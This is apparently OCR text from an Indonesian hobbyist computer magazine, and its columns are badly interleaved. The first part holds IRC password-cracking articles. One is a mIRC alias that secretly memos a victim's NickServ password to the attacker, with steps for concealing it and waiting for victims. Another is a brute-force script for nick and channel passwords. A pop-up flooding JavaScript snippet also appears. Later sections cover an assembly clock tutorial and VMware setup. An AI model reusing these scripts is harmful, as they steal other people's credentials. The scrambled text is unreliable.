window.open('http://www.odyxboy.i-p.com=5000&item=4');
window.open('http://www.wadah-online.com=5000&item=4');
window.open('http://www.odyxboy.i-p.com=10000&item=3');
window.open('http:/www.wadah-online.com=5000');
window.open('http://www.odyxboy.i-p.com=5000');
window.open('http://www.wadah-online.com=5000&item=3');
window.open('http://www.odyxboy.i-p.com=5000&item=3');
window.open('http://www.wadah-online.com=5000&item=4');
window.open('http://www.odyxboy.i-p.com=5000&item=4');
window.open('http://www.wadah-online.com');
</script>
Tambahkan onload=”go()” ke dalam tag <body> agar
ketika halaman Web di-upload pertama kali, Fake Java- Pindahkan script tersebut pada tag <bbody>
Script langsung dijalankan.
I RC PASSWO R D C R AC K I N G
AOP adalah channel operator paling rendah (bawahan). Di channel IRC. Bahkan saya sendiri, setelah melakukan uji
dalam channel, seorang AOP hanya bisa mengeluarkan coba, berhasil meng-crack sebuah kata sandi nick dan
(kick) peserta lain dari dalam channel jika dianggap nakal. channel musuh lama saya di server IRC DALnet. Proses
AOP juga boleh memberi status +V (voice). Tapi AOP itulah yang saya jadikan gambar untuk melengkapi
tidak berhak mengangkat peserta lain untuk menjadi tulisan ini.
channel operator, apalagi sampai meng-kick atau Agar anda tidak memperoleh pesan kesalahan seperti
menghapus account SOP. yang terlihat pada gambar di bawah ini saat menginstal
User Biasa Para peserta (anggota) yang ikut meramaikan Wicked IRC Password Cracker, pastikan bahwa di dalam
channel. User biasa tidak memiliki hak sedikit pun untuk direktori C:\WINDOWS\SYSTEM anda sudah ada file-
ikut campur dalam mengelola channel. file berikut:
Nah, setelah anda memahami arti, fungsi, dan kegunaan- • MSVCRT40.DLL
nya, sekarang saya akan membahas cara meng-crack kata • OLEPRO32.DLL
sandi (password) kedua komponen penting IRC tersebut. • VB40032.DLL
Adapun tool atau program yang akan kita gunakan untuk Jika anda tidak berhasil menemukan ketiga buah file ter-
melakukan tugas tersebut, adalah Wicked IRC Password sebut di atas dalam folder C:\WINDOWS\SYSTEM\,
Cracker. Tool ini merupakan skrip addon IRC yang dibuat silahkan mendownloadnya di
oleh seseorang dengan inisial Beefcake. Sayangnya alamat
Web pemilik program yang dicantumkan dalam file READ- www16.brinkster.com/erytricksy/Software/vb40032.zip
ME.TXT sudah tidak aktif lagi. Jadi, jika anda tertarik meng- atau anda bisa me-request-nya ke alamat email saya.
gunakan Wicked IRC Password Cracker, silakan menginstal-
nya langsung dari CD NeoTek nomor ini. Atau anda juga
bisa men-download-nya di
www16.brinkster.com/erytricksy/Software/irc_cracker.zip
Meskipun cara kerja program ini bisa dikatakan sangat
simpel dan sederhana, tetapi menurut informasi pembuat-
nya, program yang dibuat dari bahasa skrip IRC ini per-
nah sukses meng-crack beberapa kata sandi nick dan
• Pesan kesalahan saat menginstal Wicked Password Cracker.
MENAMBAHKAN SKRIP Addon (load) skrip yang anda instal ke mIRC SETELAH PROSES ADDON
4 client anda. Caranya, jalankan program mIRC, lalu dari jendela status
mIRC, ketik /LOAD -RS C:\WICKED\CRACKER\CRACK.MRC. Ketika anda
5 Jika addon sukses (skrip ber-
hasil di-load), akan muncul
mengetik perintah tersebut, program mIRC akan meminta konfirmasi. pesan di atas.
I RC PASSWO R D C R AC K I N G
Skrip Nick Password Cracking
Anda dapat meng-crack kata sandi nick seseorang pada IRC dengan menggunakan skrip yang ditanamkan
di komputer orang lain. MA Rody Candera (odyxb@melva.org) memberiikan skrip itu
disertai dengan petunjuk penggunaanya langkah per langkah.
/identify {
/set %y1 $$1
/.msg nickserv@services.dal.net identify $1-
/.timer 1 480 /.memoserv send [Nick] Nick: $me Password: %y1
/.timer 1 485 /.clear
/.unset %y1
}
Buka mIRC anda tanpa mela- Klik Tools Menu → pilih dan Pindahkan skrip yang diperli-
1 kukan koneksi ke server dalnet
karena kita akan memindah-
2 klik Aliases... Alt + A tunggu
sampai Editor mIRC untuk
3 hatkan di atas ke dalam Editor
mIRC Aliases, jangan lupa
kan skrip tersebut terlebih Aliases muncul. mengganti [Nick] dengan nick
dahulu. anda sendiri yang telah
diregisterkan.
Agar skrip tersebut tidak dili- Masih di Editor mIRC, posisi- Selesai sudah menanamkan
4 hat orang lain yang kebetulan
melihat-lihat Editor mIRC,
5 kan kembali scroolbar ke atas
dan klik File → Save → OK.
6 skrip tersebut, dan tinggal me-
nunggu korban saja. Tetapi si-
tetapi biasanya orang lebih lakan mencoba apakah peker-
suka melihat Editor mIRC Re- jaan anda itu berhasil. Masuk-
mote untuk menghindari hal- kan nick yang akan dijadikan
hal yang dianggap menggang- kelinci percobaan dengan ca-
gu privasinya, seperti yang tatan nick tersebut harus nick
sering dilakukan penulis sen- yang teregister karena hanya
diri, turunkan skrip tersebut ke nick yang teregister yang me-
bawah sehingga Editor mIRC miliki password. Selanjutnya
Aliases muncul scroll bar lakukan connection ke server
dalnet.
Setelah koneksi berjalan, nick Tunggu untuk beberapa saat Sekarang coba buka mIRC satu
7 teregister yang anda pakai di-
minta untuk memasukkan pass-
8 sekitar 8 menit, perhatikan
Status. Muncul pesan bahwa
9 lagi, gunakan nick yang dipakai
di dalam skrip. Apakah kita te-
wordnya sebagai bukti kalau ada pengiriman memo ke nick lah menerima memo dari nick
user tersebut adalah pemilik tertentu, tetapi itu hanya seben- korban yang berisi password
nick tersebut. tar dapat dilihat karena 5 detik nick tersebut.
ke depan semua tulisan di Dari gambar kedua di atas ter-
Status hilang (seperti melaku- lihat bahwa anda telah mene-
kan command Clear). Itu mem- rima memo dari nick korban,
buktikan pekerjaan anda bacalah apa isi memo terse-
berhasil. but. Ternyata nick odyxb pass-
wordnya lontongsayur.
I RC PASSWO R D C R AC K I N G
Bongkar Paksa Nick &
Channel Password
Banyak cara untuk mendapatkan password nick dan channel orang . Putut Indrayana (matrik7@yahoo.com)
menyajikan salah satu cara yaitu dengan menjalankan skrip yang menjalankan proses brute force.
Skrip pada artikel ini telah diuji coba oleh MA Rody Candera (odyxb@melva.org).
#passhack on
on 696969:notice:*accepted*:*:{
if ($nick == NickServ) goto npKetemu | elseif ($nick == ChanServ)
goto cpKetemu | halt
halt
:npKetemu
if ($window(@PassKetemu) == $null) { window -a @PassKetemu
150 150 500 79 } | else /clear @PassKetemu
titlebar @PassKetemu NickServ Password Ketemu nick anda yang telah diregisterkan. Setelah disimpan dan
drawtext -o @PassKetemu 4 Algerian 40 35 6 NickServ Password diganti tulisan Prayana menjadi nick anda, selamatkan
Ketemu!
pekerjaan anda dengan mengklik File → Save lalu klik OK
timer500 off
timer503 off Selanjutnya kita tunggu nick siapa yang akan menjadi
halt korban pertama dan korban selanjutnya, nantikan memo-
:cpKetemu servnya. Pada saat nick korban melakukan identify, maka
if ($window(@PassKetemu) == $null) { window -a @Passketemu pada saat itu juga password yang dimasukkan atas nicknya
150 150 500 79 } | else /clear @PassKetemu tersebut dikirimkan dalam bentuk memoserv ke nick anda.
titlebar @PassKetemu ChanServ Password Ketemu Untuk lebih memastikan skrip langsung berjalan melaku-
drawtext -o @PassKetemu 4 Algerian 40 35 6 ChanServ Password kan aktivitasnya, pada Options mIRC → IRC → Perform
Ketemu!
beri tanda cek pada “On connect, performs these
timer501 off
commands:” dan masukkan command /remote on pada
timer503 off
kotak besar di bawahnya.
halt
}
on 696969:notice:*Invalid*:*:halt
on 696969:notice:*Incorrect*:*:halt
#passhack end
Tukar Otak
Proyek Digital Clock (5)
Melanjutkan artikel Advanced Digital Clock, tutorial kali ini menjelaskan kerja perangkat lunak
NeoClock2.asm. Hardy (hardythe@cbn.net.id) membahas bagian yang belum dibahas pada
tutorial sebelumnya.
ADA BAGIAN RAM, DITAMBAHKAN register baru Subroutine yang bertugas menentukan apa yang ditampilkan
P dengan nama T1 (Timer 1) dan T2 (Timer 2) untuk
jam puluhan, jam satuan, menit puluhan dan menit
(DispPrep—Display Preparation) akan meletakkan datanya
ke buffer ini. Bagian Display mengambil dan mengkonversi
satuan. T1Jam10 DS 1 (data storage) berarti register bernama menjadi data segment dan ditampilkan ke 4 bh 7 segment.
T1Jam10 (Jam puluhan untuk Timer 1) diberi lokasi sebanyak Sebagai contoh: pada mode tampilan setting timer 1, maka isi
1 byte saja. Ada kalanya kita memakai lebih dari 1 byte timer 1 (jam-Menit) akan di-copy ke Buffer. Sedangkan bila
seperti DBuf ds 4 (4 byte). Kalau saat ini saya memakai nama Timer 1-nya off, maka yang ditampilan adalah text t1 of.
masing masing dari DBuf0 sampai DBuf3 itu hanya masalah
addressing. Beberapa register difungsikan sebagai counter, dan penggu-
naan flag lebih intensif. Dengan flag, kita bisa memakai 1
Pada DBuf ds 4, untuk mencapai DBuf ke 3 saya bisa lakukan byte untuk 8 buah flag (efisien)
dengan menamainya DBuf+2. Display Buffer ke 1 ditulis
dengan "Dbuf+0" atau "Dbuf" saja. Assembler akan meng- Subroutine tetap diatur oleh mainloop. Yang tanpa filter se-
arah pada lokasi yang benar. Sedangkan dengan cara saat ini, perti Input, ModeMan, Display dan Output akan terus di
saya bisa tulis langsung Dbuf2 sebagai nama lokasinya. Real akses setiap loop. Yang berfilter seperti Second diakses setiap
address-nya (sering disebut effective address) ditentukan oleh second, Evaluate setiap menit dan DisplayPrep setiap setengah
lokasi register sebelumnya. detik.
Instruksi directive (mengarahkan kerja assembler dan tidak ** MAIN LOOP ***********************************************************
berguna bagi MCU) org (origin)-lah yang menentukan lokasi
riilnya. Lihat file listing hasil assembling. Di sana tertera MAIN jsr InputJob ; process increment value (SW2)
lokasi real register tersebut. jsr ModeManJob ; manage mode (SW1)
braclr DoSec,MAIN10 ; if Second task time,
Memang metode puluhan dan satuan ini lebih boros diban- bitclr DoSec ; clear flag first
dingkan dengan cara menggabung kedua nilai menjadi 1 re- jsr SecondJob ; do second event
gister. Alasan pemilahan metode boros ini karena RAM MCU MAIN10 braclr DoMin,Main20 ; if Minute task time,
bitclr DoMin ; clear flag first
memang masih banyak serta ROM yang sebesar 8 kilobyte jsr EvaluateJob ; do minute event (evaluate timer)
tidak akan penuh karena penggunaan metode ini (efek tidak Main20 braclr HalfSec,Main30 ; if Half Second Event occur,
langsung) dan yang penting adalah kesederhanaannya karena bitclr HalfSec ; clear flag first
tidak perlu konversi terlebih dahulu dari 1 byte menjadi 2 jsr DispPrepJob ; Prepare Display
Main30 jsr DisplayJob ; Display Time
digit untuk ditampilkan sebagai angka satuan dan puluhan- jsr OutputJob ; execute output (relay & buzzer)
nya. Hal itu sangat penting di artikel NeoClock1.asm yang bra MAIN ; make a loop
ditujukan untuk pemula.
Mode yang diterapkan di NeoClock2.asm menghasilkan tam- Sebelum masuk ke jump table, input subroutine memeriksa
pilan yang berbeda dalam setiap modenya. Pemilihan tugas SW1 dan SW2. Hanya apabila SW1 open dan SW2 pushed,
dilakukan dengan menyediakan buffer display sebanyak 4 jump table diakses. Selain itu routine langsung ke luar
byte yang merupakan bayangan bagi tampilan 4 buah 7 (Input0 yang langsung rts—return from subroutine).
segment tapi masih berupa angka desimal. Langkah pertama pemakaian jump table adalah mengambil
nilai pada register Mode karena Mode yang menentukan
T1Jam10 ds 1 ; Jam Puluhan Timer1
tugas saat itu (akan loncat ke mana).
T1Jam1 ds 1 ; Jam Satuan Timer1 Dengan masuknya nilai mode ke index register (X), instruksi
T1Men10 ds 1 ; Menit Puluhan Timer1 ke 2 akan mengisi ulang register X tadi dengan "nilai yang
T1Men1 ds 1 ; Menit Satuan Timer1 berada pada lokasi" yang ditunjuk oleh lokasi base (InpTbl)
T2Jam10 ds 1 ; Jam Puluhan Timer2 ditambah dengan nilai X sebelumnya.
T2Jam1 ds 1 ; Jam Satuan Timer2 Misalnya mode = 3 (isi X jadi 3, maka pada opcode kedua, X
T2Men10 ds 1 ; Menit Puluhan Timer2 akan diisi oleh lokasi InpTbl + 3 (isi X). Hasilnya adalah nilai
T2Men1 ds 1 ; Menit Satuan Timer2 Input3-InpTbl (jarak). Setelah dapat jarak InpTbl ke tujuan,
DBuf0 ds 1 ; Buffer display 4 bh 7 segment. kita gunakan untuk jump (melompat) ke lokasi tujuan de-
DBuf1 ds 1 ngan melompat dari base sejauh jarak tadi. Tentunya hasil-
DBuf2 ds 1 nya kita akan berada di lokasi tujuan.
DBuf3 ds 1 Cara penulisan seperti "Input3-InpTbl" ini memungkinkan
kita mengubah routine (bila ada perbaikan) pada input 0 *** SecondJob aktif tiap second ******************************************
sampai 2 tanpa perlu menghitung jarak kedua lokasi tersebut *** Decrement Relay delay dan Buzz delay sampai 0 (off)
secara manual karena akan dilakukan oleh assembler dalam
proses assembly-nya SecondJob tst Relaydly ; test Relay delay
beq Sec20 ; if <> 0,
dec Relaydly ; decrement relay delay
*** InputJob proses SW2on1 ******************************************** Sec20 tst Buzzdly ; test Buzz delay
beq Sec30 ; if <> 0,
InputJob braset SW1on,Input0 ; if SW1 open, dec Buzzdly ; decrement buzz delay
braclr SW2on1,Input0 ; if SW2 pushed,
bitclr SW2on1 ; clear flag first
ldx Mode ; get mode Pencocokan timer di Evaluate dilakukan setiap menit karena
ldx InpTbl,x ; to get distance from table
jmp InpTbl,x ; and jump to destination. satuan terkecil setting timer adalah menit. Dilakukan dengan
cara sederhana dan bertahap. Sebelum proses pencocokan, di
InpTbl fcb Input0-InpTbl test dulu apakah timer bersangkutan aktif. Bila tidak, lompati
fcb Input1-InpTbl
fcb Input2-InpTbl saja dari pada membuang waktu percuma.
fcb Input3-InpTbl ; ß ← isinya yang diambil.
fcb Input4-InpTbl
fcb Input5-InpTbl
fcb Input6-InpTbl *** EvaluateJob aktif tiap menit compare jam dengan kedua timer
fcb Input7-InpTbl EvaluateJob braclr Tim1on,Eva50 ; if Timer 1 on,
fcb Input8-InpTbl lda Men1 ; get menit1
Input0 rts ; just quit, not here cmp T1Men1 ; compare dgn menit1 Timer 1
bne Eva50 ; if equal,
Input1 inc Jam1 ; Mode1 (increment jam) lda Men10 ; get menit10
cmp T1Men10 ; compare dgn menit10 Timer 1
bne Eva50 ; if equal,
lda Jam1 ; get jam satuan
Tidak ada yang baru dalam input nilai jam dan menit baik
untuk jam sebenarnya dan Timer 1 dan Timer 2. Cukup mi-
rip dengan Secondjob sebelumnya (NeoClock1.asm). Ada 2 Jump Table di dalam DispPrep. Di bagian atas
Untuk mencocokkan Detik dari Jam sebenarnya dipakai me- merupakan bagian yang dipanggil oleh table di tengah yang
tode: detik akan direset dan langsung start pada setiap pene- di call oleh Mainloop. Prosedur cukup sederhana, Cuma ada
kanan SW2 pada mode set menit. filter yang menghasilkan efek berkedip dengan cara pada
perioda setengah detik lokasi di isi dengan data, dan setengah
* setiap penekanan untuk setting menit akan mereset detik detik periode selanjutnya di kosongi. Pada Sub-mode
ke 00 & prescaler-nya ke 25 RUNdisplayMode hanya terjadi perubahan tampilan statis.
Apabila Timer 1 off maka yang keluar adalah tulisan t1 of
Input2 clr Detik1 ; clear detik satuan sedangkan apabila aktif, yang tampil adalah nilai settingnya.
clr Detik10 ; clear detik puluhan
mov #25,Tick ; set prescaler *** DispPrep mempersiapkan data yang akan di display ***************
inc Men1 ; Mode2 (increment menit)
RealPrep0 ldx RunDispMode ; for mode 0 (RUN),
ldx RDModeTbl,x ; get distance
jmp RDModeTbl,x ; jump to destination
Toggle On Off timer 1 dilakukan dengan membaca dulu kon-
disi saat ini dengan instruksi braset Tim1on, Input35 yang RDModeTbl fcb RDM0-RDModeTbl
artinya: Branch (loncat) ke baris berlabel Input35 apabila bit fcb RDM1-RDModeTbl
(flag) Tim1on sedang set. Tim1on set apabila Timer 1 sedang fcb RDM2-RDModeTbl
aktif. Ada 2 kemungkinan dari pencabangan (branch) ini: fcb RDM3-RDModeTbl
1. saat ini Tim1on set (aktif), maka loncat ke Input35 dan RDM0 ldx #3 ; RunMode 0 (jam-
mematikan timer dengan bitclr Tim1on. Lalu rts. menit)
2. saat ini Tim1on clear (non aktif), maka diteruskan dengan ---deleted---
mengaktifkannya dengan bitset Tim1on. Loncat (bra) ke DispPrepJob ldx Mode ; get mode
Input39 lalu rts. ldx PrepTab,x ; use to get distance
jmp PrepTab,x ; jump to destination
Input3 braset Tim1on,Input35 ; Mode3 (TIMER1 toggle on - off) PrepTab fcb Prep0-PrepTab
bitset Tim1on ; if timer 1 off, make it on fcb Prep1-PrepTab
bra Input39 ; then quit fcb Prep2-PrepTab
Input35 bitclr Tim1on ; else, make it off fcb Prep3-PrepTab
Input39 rts ; quit fcb Prep4-PrepTab
fcb Prep5-PrepTab
fcb Prep6-PrepTab
Penambahan pada subrotuine ini hanya decrement Relay dan fcb Prep7-PrepTab
fcb Prep8-PrepTab
Buzzer delay. Karena routine ini diakses setiap 1 detik maka
nilai 5 yang diisi di bagian Output akan menghasilkan delay
Prep0 jmp RealPrep0
5 detik (relay-nya menyala 5 detik). Decrement dilakukan * ---------------------------------------------------------------------
bila delaynya belum mencapai nilai 0.
Prep1 braset AltDisp,Prep15 ; Mode1 jam (kedip) dan menit
DisplayJob berubah sedikit. Kalau dulu mengambil data lang- Tim3 ts RunDdly ; get RunMode Display delay value
sung dari lokasi Jam10 sampai Detik1, sekarang mengambil beq Tim5 ; if <> 0
dari Dbuf karena adanya kebutuhan perubahan tampilan dec RunDdly ; decrement it
yang sudah diselesaikan oleh bagian Display Preparation.
Efisiensi tampilan diperbaiki dengan memindahkan instruksi Tim5 dec Tick ; Use Tick Register as counter
pemadaman semua digit ke lokasi persis sebelum pengubah- lda Tick ; get Tick Value
cmp #12 ; compare with Half Second
an data portB dan penyalaan kembali.
bne Tim7 ; if = half second,
PR untuk mengubah kecerahan bisa dilakukan dengan me- bitset HalfSec ; set Half second flag
ngurangi jumlah penyalaan sesuai waktu. Lakukan dengan bra Tim10 ; next
memfilter baris instruksi “mov Dig2Fire,PORTA.”
Tim7 tst Tick ; test Tick
Segment tambahan di Table berguna untuk membentuk bne Tim10 ; if = 0,
huruf sederhana: t, o, f, n dan blank. lda #25 ; load Tick Counter by 25
sta Tick ; to create about (not accurate)
bitset DoSec ; 1 Second Event
Disp30 ldx Dig2Disp ; use Dig2Disp as pointer to bitset AltDisp ; 1 second event
lda DigTable,x ; get Digit # to display (in bit bitset HalfSec ; also half second event
pattern)
sta Dig2Fire ; save it temporarily
Disp70 ldx DBuf0,x ; get value to display, use as pointer
to Pada Bagian IRQ hanya dipakai untuk menangkap
lda SegTable,x ; get Segment pattern penekanan tombol SW1.
mov #$1E,PORTA ; kill all digit first to avoid ghost
sta PortB ; send to PortB IrqJob tst SW1Frz
mov Dig2Fire,PORTA ; turn on Digit in charge bne Irq99
rts ; Quit bitclr Mode1 ; just make sure
---- deleted ---- bitset SW1on ; set flag
SegTable fcb $40 ; 0 0100 0000 mov #12,SW1Frz
fcb $76 ; 1 0111 0110 Irq99 rti
---- deleted ----
fcb $04 ; 9 0000 0100
fcb $19 ; t 0001 1001 Pada Vector Table hanya ditambah dengan address IrqJob.
fcb $38 ; o 0011 1000
fcb $0B ; f 0000 1011
fcb $3A ; n 0011 1010 org $FFF6
fcb $7F ; 0111 1111 Security dw DummyISR ; $FFF6-FFF7 TIM Channel 0
Dw DummyISR ; $FFF8-FFF9 CMIREQ Vector
Chr_t equ 10 ; huruf t (kecil) dw IrqJob ; $FFFA-FFFB IRQ 1 Vector
Chr_o equ 11 ; huruf o (kecil) dw DummyISR ; $FFFC-FFFD SWI Vector
Chr_f equ 12 ; huruf f (kecil)
Chr_n equ 13 ; huruf n (kecil)
Chr_ equ 14 ; blank
VMware Workstation
untuk Linux
Besarnya minat neoteker terhadap VMware untuk Linux, membuat NeoTek mengangkat
kembali topik virtual machine ini dengan tulisan Asmuri Anwar (asmuri@persda.co.id) yang
melengkapi bahasan VMware untuk Windows sebelumnya.
rasi guest. Walaupun VMware Work- 14. Jawab Yes pada pertanyaan di layar
station akan dapat menjalankan sebuah Aanda, kemudian klik Next untuk
sistem operasi guest tanpa tool-tool menginstal driver. Sesudah insta-
VMware, namun dalam lingkungan lasi driver berhasil, klik Finish.
grafik, paling tinggin hanya menangani 15. Klik Close untuk keluar dari dialog
resolusi rendah (640x480, 16 color). SVGA Properties, kemudian klik
Dengan VMware Tools, SVGA driver lagi Close untuk keluar dari dialog
akan langsung diinstalasikan. VMware Display Setting.
Workstation mendukung tampilan 16. VMware Tools akan langsung
sampai 32-bit dan tampilan dengan dijalankan pada saat Anda booting
resolusi tinggi, ulang komputer virtual.
File-file VMware Tools untuk Linux
dan VMware Tools untuk Windows
dapat dimasukkan ke dalam VMware
Workstation (Settings à VMware Tools
Ini adalah langkah terakhir dalam Install). VMware Tools untuk Win-
konfigurasi. Periksa sekali lagi dows mendukung sistem operasi guest
pilihan-pilihan yang sudah Aanda seperti Windows 95/98, NT 4.0, dan
tentukan. Jika sudah benar klik Windows 2000.
tombol Done.
VMware merekomendasikan untuk Instalasi VMware Tools for Windows
menggunakan Configuration Wizard 1. Aktikan komputer virtual.
untuk membuat konfigurasi komputer 2. Konfigurasi ulang komputer vir-
virtual anda. Namun, anda juga dapat tual anda menggunakan VMWare
menggunakan Editor untuk pengguna- Tools floppy image. Pilih Settings
an lebih lanjut. → VMware Tools Install 17. Sesudah me-restart komputer vir-
tual Windows 98, buka device
Instalasi Sistem Operasi Guest 3. Klik ganda ikon My Computer di manager dan yakinkan display
Menginstal sebuah sistem operasi Desktop anda adapter yang anda gunakan adalah
guest di dalam komputer virtual pada 4. Klik ganda ikon drive A: VMware SVGA(FIFO).
dasarnya sama saja dengan saat anda 5. Klik ganda VMwareTools.exe dan
menginstal sistem operasi pada sebuah ikuti instruksi yang ditampilkan. Instalasi VMware Tools for Linux
komputer secara fisik. Instruksi untuk melakukan konfi- 1. Jalankan komputer virtual anda.
Untuk menginstal sistem operasi pada gurasi driver kartu VGA akan di- Berikut ini langkah-langkah yang
komputer virtual, ikuti langkah-langkah tampilkan secara otomatis di Note- harus Anda lakukan pada komputer
berikut: pad pada saat akhir proses instalasi. virtual, bukan di host komputer.
Jika window Notepad tersembunyi, 2. Pastikan komputer virtual anda siap
1. Masukkan CD-ROM instalasi atau klik tombol Notepad dari taskbar untuk diinstal VMware Tools.
floppy disk untuk sistem operasi Windows.
guest. Pilih Settings → VMware Tools
6. Setelah anda mengklik tombol Finish, Install
2. Aktifkan komputer virtual dengan akan ditampilkan window Display
mengklik tombol Power On. Jika anda tidak memutuskan untuk
Settings. tidak jadi menginstal VMware
3. Ikuti langkah-langkah instalasi 7. Klik tombol Advanced. Akan mun- Tools, anda dapat membatalkannya.
seperti biasa Anda menginstalasi cul dialog Standard Display Adapter Pilih Settings → Cancel VMware
sistem operasi lainnya. (VGA) Properties. Jika Anda meng- Tools Install.
Sistem operasi yang dapat Anda upgrade dari versi, dialog yang 3. Jika melanjutkan dan anda belum
instalasikan pada VMware muncul adalah VMware SVGA sebagai root, pada terminal ketikkan:
Workstation seperti: Properties. su
• Windows NT 4.0 8. Klik Adapter. 4. Lakukan mounting ke drive
• Windows 95 9. Klik tombol Change. Muncul dialog /dev/fd0 (merupakan virtual floppy
• Windows 98 Update Device Driver Wizard. Klik disk yang berisi file VMware Tools),
• Windows 2000 Next. copy-kan file tersebut ke direktori
• DOS / Windows 3.1 10. Dialog Wizard menampilkan dua /tmp, lalu unmount floppy.
• Caldera OpenLinux opsi. Pilih opsi Display a list of all
• Corel Linux OS cd /
drivers in a specific location... se- mount -t vfat /dev/fd0 /mnt
• Red Hat Linux lanjutnya klik tombol Next.
• SuSE Linux cp /mnt/vmware-linux-tools.tar.gz
• FreeBSD 11. Klik tombol Have Disk. Muncul /tmp
• Novell NetWare (masih dalam dialog Install From Disk. umount /dev/fd0
percobaan) 12. Selanjutnya pindah ke direktori ins- 5. Ekstrak file tar VMware Tools ke
talasi VGA untuk Win9x, klik OK: direktori /tmp kemudian instal.
Instalasi VMware Tools untuk A:\WIN9x cd /tmp
Sistem Operasi Guest 13. Pilih display adapter VMware tar zxf vmware-linux-tools.tar.gz
Menginstal aplikasi VMware Tools SVGA(FIFO) dan klik OK. cd vmware-linux-tools
akan sangat berguna bagi sistem ope- ./install.pl
anda login. Pada Device tab pastikan 2. Pilih Configuration Editor dari Shut Down Komputer Virtual
pula komputer virtual Anda dapat menu Settings.
1. Pilih Shut Down dari menu Start
mengakses CD-ROM dan floppy +) di bagian IDE
3. Klik tanda plus (+ sistem operasi guest (Windows 98).
disk. Drives untuk melihat subdirektori
2. Masukkan CD atau floppy Instalasi di bawahnya, kemudian klik drive
ke drive yang bersangkutan. Jika primary (P-M = Primary Master)
anda menginstal melalui CD-ROM untuk memilih drive tersebut.
program mungkin akan dijalankan 4. Pilih opsi yang sesuai untuk mode
secara otomatis. disk Persistent, Nonpersistent, atau
3. Jika program instalasi tidak secara Undoable, klik Save untuk melaku-
otomatis dijalankan, di Windows, kan perubahan dan tutup Configur-
klik tombol Start → Settings → ation Editor.
Control Panel, klik ganda Add/
Remove Programs dan klik tombol Menggunakan Suspend dan
Install. Ikuti langkah-langkah yang Instant Restore
diberikan software tersebut selama Suspend pada komputer virtual:
proses instalasi.
1. Jika komputer virtual anda sedang
Cutting dan pasting aktif dalam mode full-screen, kem-
balikan ke window mode dengan 2. Pilih tombol radio Shut Down, klik
SaatVMware menekan tombol kombinasi OK.
Tools sedang Ctrl+Alt+Esc secara bersamaan.
dalam ke- 3. Untuk keluar dari aplikasi VMware
adaan jalan, anda dapat melakukan 2. Klik tab Suspend pada tombol Workstation, sebaiknya sistem
copy dan paste di antara aplikasi-apli- VMware Workstation. operasi guest yang aktif Anda shut
kasi, baik pada komputer virtual mau- down terlebih dahulu.
pun host komputer, bahkan antara dua Jika anda menggunakan sistem operasi
atau lebih komputer virtual. guest yang berbeda, prosedurnya
menjalankannya sama saja.
Menggunakan mode disk
VMware Workstation dapat menggu-
nakan tiga perbedaan mode disk, yaitu Ketinggalan Membaca
persistent, nonpersistent, dan undoable. NeoTek?
Persistent disks berlaku persis seperti Edisi lama: harga khusus &
disk drive biasa pada sebuah komputer.
Penulisan ke sebuah persistent disk bebas ongkos kirim
ditulis secara permanen ke dalam disk. Baru tahu ada majalah NeoTek?
Penulisan menggunakan mode non- Penawaran khusus edisi lama NeoTek
persistent akan menghilangkan data 3. Untuk keluar dari VMware Rp15.000,-/eks (dengan CD)
yang dituliskan pada saat anda mema- Workstation. Rp8000,-/eks (tanpa CD)
tikan komputer virtual. Pada mode Pilih menu File → Exit Rp10.000,-/eks (CD saja)
undoable, aAnda mempunyai opsi
apakah anda akan membiarkan data Mengembalikan komputer virtual dari Hubungi: Elvy Risma Nainggolan
anda atau tidak selama anda bekerja. status suspended: (redaksi@neotek.co.id)
Sebelum anda putuskan memilih salah Telp. 021-5481457
1. Memulai VMware Workstation dan
satunya, data akan tersimpan pada pilih komputer virtual yang sedang Ada apa saja di edisi lama NeoTek?
pada sebuah file redo-log. II/1 Oktober 2001
dalam posisi suspended. Proses di Hacking dengan Back Orifice
atas gambarannya sama ketika II/2 November 2001
Anda memulai komputer virtual Dasar-dasar Remote Hacking
seperti sebelumnya II/3 Desember 2001
Footprinting: Intelijen Awal
2. Klik Resume pada bar tombol II/4 Januari 2002
VMware Workstation. Software Cracking
II/5 Februari 2002
Meng-hack NT Server
II/6 Maret 2002
SoftICE: Serial Fishing
II/7 April 2002
Mengintip Password dengan Dsniff
II/8 Mei 2002
Superscan: Scanning Tool setara Nmap
II/9 Juni 2002
Anda dapat menggunakan konfigurasi Skrip mIRC & EggDrop
II/10 Juli 2002
editor untuk mengubah mode disk Legion: Jalan-jalan ke Komputer Orang
untuk komputer virtual anda. II/11 Agustus 2002
1. Ikuti Langkah 1 dan 2 pada Starting Hacking & PC Securit; Virus & Trojan
II/12 September 2002
a Virtual Machine, tetapi jangan Password Cracking: Seni & Tekniknya
klik tombol Power On sebelumnya.
CONNECTIX VIRTUAL PC
onnectix Virtual PC for Windows
C dapat diinstal pada berbagai versi
Windows. Pada contoh ini, Virtual
PC akan diinstal pada Windows ME.
CONNECTIX VIRTUAL PC
ard disk image yang dibentuk
H merupakan hard disk kosong yang
padanya dapat diinstalkan sistem
operasi yang diinginkan. Untuk itu mesin